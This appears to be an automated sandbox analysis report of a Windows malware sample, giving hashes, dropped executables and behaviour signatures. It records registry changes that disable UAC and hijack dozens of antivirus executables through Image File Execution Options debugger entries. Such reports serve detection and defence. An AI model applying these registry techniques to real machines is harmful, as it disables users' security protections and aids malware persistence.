Analysis Overview
SHA256
191f71d0ce6906e90271c1a713d6420759744e21455818a244f4331f38e16b08
Threat Level: Known bad
The file 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
UAC bypass
Stops running service(s)
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Indicator Removal: File Deletion
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Modifies Internet Explorer settings
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-31 05:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-31 05:06
Reported
2024-10-31 05:08
Platform
win7-20241010-en
Max time kernel
14s
Max time network
19s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID\ = "IMAPI2.MsftDiscFormat2Data.1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Programmable\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64\ = "%SystemRoot%\\SysWow64\\sdohlp.dll\\1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\ = "IAS SDO Helper 1.0 Type Library" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib\ = "{443FC784-A7AA-A9B0-6E89-3A91DED0287F}" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32\ = "%SystemRoot%\\SysWow64\\sdohlp.dll\\1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\VersionIndependentProgID\ = "IMAPI2.MsftDiscFormat2Data" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ = "Evebof Wodiposbo Kocagedpa Object" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\InprocServer32\ = "C:\\Windows\\SysWOW64\\imapi2.dll" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\TypeLib\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\ProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Programmable | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{443FC784-A7AA-A9B0-6E89-3A91DED0287F}\1.0\0\win64 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D86F7E94-0708-4FB2-98BA-F335FBA01F6E}\Version\ = "1.0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
| Hash | Value |
| --- | --- |
| MD5 | cb29fc6c4d1be6464d118d58750c7286 |
| SHA1 | d942e69817be663057275b373b308f6f4a5bdea4 |
| SHA256 | a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9 |
| SHA512 | bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
| Hash | Value |
| --- | --- |
| MD5 | c0ecef6a5e45a04e9b341ef74a4dd08f |
| SHA1 | f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a |
| SHA256 | 7f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d |
| SHA512 | fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac |
memory/928-23-0x00000000032B0000-0x0000000003689000-memory.dmp
memory/928-25-0x00000000032B0000-0x0000000003689000-memory.dmp
memory/2468-30-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2468-31-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-32-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-34-0x0000000000DB0000-0x0000000001189000-memory.dmp
memory/2468-33-0x0000000000400000-0x00000000007D9000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-31 05:06
Reported
2024-10-31 05:08
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
140s
Command Line
Signatures
Disables service(s)
UAC bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Disables taskbar notifications via registry modification
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgri32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvxd.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netinfo.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscenu6.02d30.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fih32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fnrb32.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsma32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JsRcGen.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mrflux.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npssvc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brw.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcupdate.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neomonitor.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beagle.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav95.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwtool16.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdater.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgctrl.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prmvr.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tca.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgw.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRegSvr.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfd.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netutils.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vettray.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fch32.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixfp.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nui.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWEBGRD.EXE | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanIELow.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssupdat.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webdav.exe | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
